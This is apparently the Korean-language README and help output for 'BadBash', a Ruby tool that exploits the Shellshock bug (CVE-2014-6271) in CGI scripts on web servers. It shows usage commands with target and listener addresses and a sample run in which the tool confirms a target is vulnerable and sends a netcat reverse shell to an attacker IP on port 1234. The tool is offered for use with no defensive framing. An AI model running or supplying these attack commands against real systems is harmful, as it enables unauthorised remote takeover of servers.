
CVE-2014-6271 RCE 도구
BadBash는 CVE-2014-6271 RCE 익스플로잇 도구입니다. 기본 버전은 HTTP CGI 사이트만 확인하며 포트 1234에서 netcat 리버스 셸만 제공합니다.
개발자 : Andy Yang 버전 : 0.1.0 라이선스 : GPLv3
================================================================================================ RainMak3r@Could:~/Desktop# ruby BadBash.rb -h
BadBash - Andy Yang의 CVE-2014-6271 RCE 도구 기본 버전은 HTTP 사이트만 확인합니다. 기본 버전은 포트 1234에서 netcat 리버스 셸만 제공합니다.
사용 예:
./BBash.rb -t 'www.target.com/cgi-folder/cgi.sh' -d '127.0.0.1'
./BBash.rb -t '10.0.0.1/cgi-folder/cgi.sh' -d '127.0.0.1'
-t, --Target CGI path CGI 페이지의 전체 경로
-d, --Destination IP 인바운드 연결을 수신할 IP 주소
-h, --help 도움말 표시
RainMak3r@Could:~/Desktop#ruby BadBash.rb -t '172.16.235.140/cgi-bin/Andy.sh' -d '172.16.189.1'
[Info] 대상이 취약한지 확인 중........
[Info] 최대 10초까지 걸릴 수 있습니다........
[Info] 대상이 취약합니다!!!
[Info] NC를 사용하여 포트 1234에서 리버스 셸을 수신 대기하십시오..........
[Info] netcat을 통해 172.16.189.1:1234에 연결할 리버스 셸을 익스플로잇하는 중 ..........